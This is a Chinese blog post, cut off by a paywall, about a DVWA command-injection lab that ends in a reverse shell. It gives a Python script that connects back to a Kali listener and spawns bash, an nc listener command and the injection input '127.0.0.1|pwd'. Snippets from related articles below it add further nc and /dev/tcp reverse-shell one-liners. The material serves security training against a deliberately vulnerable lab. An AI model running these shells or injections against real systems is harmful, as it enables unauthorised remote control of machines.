【DVWA】反弹shell实验

最新推荐文章于 2024-05-14 04:44:11 发布
最新推荐文章于 2024-05-14 04:44:11 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42288123/article/details/103533011
版权

反弹shell实验

实验环境:metasploitable2;dvwa-linux版

操作过程

  1. 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序

    #leafpad getshell.py

import socket,subprocess,os
s=socket. socket( socket.AF_INET , socket. SOCK_STREAM)
s. connect(("192.168.5.128", 1234) )	#CHANGE THIS
os.dup2(s. fileno() ,0)
os.dup2(s. fileno() ,1)
os.dup2(s. fileno() ,2)
p=subprocess. call(["/bin/bash","-i"] )

  2. 在kali中使用shell命令/etc/init.d/apache2 start开启apache服务

  3. 在kali中监听1234端口nc -vnlp 1234

  4. 打开浏览器,进入DVWA中,在命令执行中输入127.0.0.1|pwd得到命令执行漏洞路径在这里插入图片描述

  5. metasploitable2中进入/var/www/dvwa/vulnerabilities/exec路径中,下载getshell.py

最低0.47元/天 解锁文章
super小明
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1286
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
反弹shell
weixin_45676689的博客
11-05 248
Nc 在物理机开启1234端口并监听,在cmd输入:nc.exe -lvvp 1234 在被攻击者(windows)电脑cmd中输入:nc.exe 192.168.31.201 1234 -e cmd.exe 在物理机就可以看到反弹过来的shell,也能执行命令 如果用linux反弹shell,输入:nc 192.168.31.201 1234 -e /bin/bash 在物理机也能看...
各种shell反弹方法_python反弹shell脚本
最新发布
2401_84972726的博客
05-14 705
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA_File Inclusion 文件包含 远程文件包含拿webshell
weixin_30929195的博客
11-03 170
MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );   与LOW相比,将四个敏感字符串过滤掉了:"http://", "https://","....
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3267
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
DVWA系列之15 文件包含漏洞利用
weixin_33883178的博客
12-22 172
明白了文件包含的原理之后,下面我们进入DVWA,选择low级别的文件包含。在页面中有提示,可以编辑URL中的page参数从而包含指定的文件,默认情况下包含的是include.php文件。 我们在D:\AppServ\www\dvwa\vulnerabilities\fi目录中创建一个测试文件test.txt,文件内容是“File Inclusion test!!”,通过文件包含漏洞可以直接查看到该...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
自动化在centos7上搭建DVWA靶场,shell脚本
11-22
自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑 自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑 自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑
DVWA靶场搭建与使用
09-02
DVWA靶场搭建
DVWA Installation
08-15
DVWA all package. DVWA-master.zip
命令注入反弹shell
-
05-23 363
命令注入反弹shell dvwa
利用js文件反弹shell
热门推荐
chaojixiaojingang
03-17 1万+
1.环境 攻击机:Kali 192.168.42.138 靶机:Win7 192.168.42.139 2.安装工具ps1encode 下载地址:https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.git 3. 利用js文件反弹shell 先利用ps1encode生成js payload ./ps1encode.rb --LHOS
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 2791
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
靶机-Acid练习:命令注入php反弹shell,使用sudo提权
7Riven's blog
01-01 865
靶机下载地址:https://download.vulnhub.com/acid/Acid.rar 1.主机发现 2.端口信息扫描 3.访问该端口 查看源码,未发现有效信息 4.尝试扫描一下web目录:打开kali自带的DirBuster或者御剑 或者 依次访问看看 是一个数据库文件下载 下载后打开看看,乱码未能解析 访问Challenge目...
几个反弹shell
wanguixiu的博客
06-09 121
几个反弹shell 作者: admin 时间: 2021-05-27 分类: 信息收集 nc -e /bin/bash 192.168.137.17 4444(www-data)bash -i >& /dev/tcp/192.168.137.17/4444 0>&1(www-data)echo "bash -i &...
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3061
渗透测试-文件包含漏洞以及php伪协议的应用
WEB安全实战(带靶场)–命令执行
renxq097的博客
12-27 1491
CTF靶场实验:命令注入
命令执行漏洞详解及DVWA靶场练习
c_programj的博客
06-25 2910
命令执行漏洞1.产生原因2.漏洞危害3.远程命令执行4.系统命令执行命令执行常用特殊字符5.常见 命令常见系统命令与功能windowslinux6.防范措施7.dvwa靶场练习windows【Low】【Medium】【High】【Impossible】linux【low】【Medium】【High】 1.产生原因 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令来执行。攻击者可以任意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。 RCE:远程命令和代码执行。 2.漏洞危害 ①继承web
dvwa的csrf实验
05-16
DVWA是一个用于测试Web应用程序安全性的漏洞测试平台,其中包括了一些常见的Web安全漏洞实验,其中包括CSRF攻击实验。下面是实现DVWA的CSRF攻击的步骤: 1. 打开DVWA漏洞测试平台,进入CSRF攻击实验页面。 2. 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值